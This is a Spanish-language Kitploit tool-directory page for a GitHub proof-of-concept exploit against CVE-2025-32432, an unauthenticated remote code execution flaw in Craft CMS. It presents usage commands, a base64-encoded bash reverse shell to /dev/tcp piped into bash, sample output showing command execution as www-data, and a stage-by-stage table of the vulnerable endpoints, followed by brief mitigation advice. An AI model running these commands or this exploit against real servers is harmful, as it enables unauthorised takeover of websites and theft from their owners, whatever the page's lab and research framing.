Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32432 — Exploit, PoC para CVE-2025-32432, CraftCMS2Shell | Kitploit
Herramientas/GitHubGitHub/c0gnit00/cve-2025-32432
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

Exploit, PoC para CVE-2025-32432, CraftCMS2Shell

Ver Repositorio
32hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32432 PoC de RCE sin autenticación en Craft CMS

Ejecución remota de código crítica sin autenticación en Craft CMS

Afectado: Craft CMS 3.x, 4.x y 5.x (hasta 5.6.16)

Info: Este exploit está probado contra la máquina Orion de HackTheBox

Resumen

Este repositorio contiene un exploit de prueba de concepto para CVE-2025-32432, una vulnerabilidad crítica de ejecución remota de código sin autenticación en Craft CMS. La vulnerabilidad permite a un atacante no autenticado ejecutar código PHP arbitrario en el servidor explotando el mecanismo de adjuntar comportamientos de Yii2 y la instanciación de objetos PHP mediante la técnica de anulación __class.

Puntuación CVSS: 10.0 (Crítica)

Características

  • Explotación sin autenticación — No se requieren credenciales de inicio de sesión
  • Compatibilidad universal — Funciona en Craft CMS 3.x, 4.x y 5.x
  • Descubrimiento automático de ID de activo — Fuerza bruta automáticamente IDs de activo válidos
  • Extracción de token CSRF — Maneja automáticamente la protección CSRF de Craft CMS
  • Fallback de ruta de sesión — Reintenta automáticamente rutas alternativas de sesión PHP si la primera falla

Requisitos

Descargar herramienta
root@kitploit:~
pip install requests urllib3

Inicio rápido

Ejecución básica de comandos

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

Shell inversa

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

Omitir fuerza bruta de ID de activo (si se conoce)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

Usar ruta de sesión alternativa

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

Uso

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

Ejemplo de salida

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Etapas del exploit

EtapaAcciónEndpointAutenticación
1Extraer cookie de sesión + token CSRFGET /admin/loginNo
2Inyectar payload PHP en el archivo de sesiónGET /index.php?p=admin/dashboard&a=<PHP>No
3Fuerza bruta de ID de activo válidoPOST /index.php?p=admin/actions/assets/generate-transformNo
4Ejecutar RCE mediante gadget PhpManagerPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>No

Versiones afectadas

RamaAfectadoCorregido
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

Mitigación

  1. Actualice inmediatamente a la última versión parcheada
  2. Monitoree los registros para detectar:
    • Múltiples solicitudes POST a /admin/actions/assets/generate-transform
    • Solicitudes GET a páginas de administración con parámetro a= que contenga código PHP
    • Presencia de campos as en los cuerpos de las solicitudes POST
  3. Habilite reglas WAF para bloquear patrones sospechosos

Créditos

  • Descubrimiento original: Orange Cyberdefense / SensePost
  • Entrada de blog: Investigando una campaña activa utilizando RCE en CraftCMS
  • Autor del PoC: Basado en la investigación de SensePost, adaptado para pruebas HTB/penetración

Descargo de responsabilidad

Esta herramienta es solo para pruebas de seguridad autorizadas y fines de investigación. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas.

Licencia

Licencia MIT - Consulte el archivo LICENSE para obtener más detalles.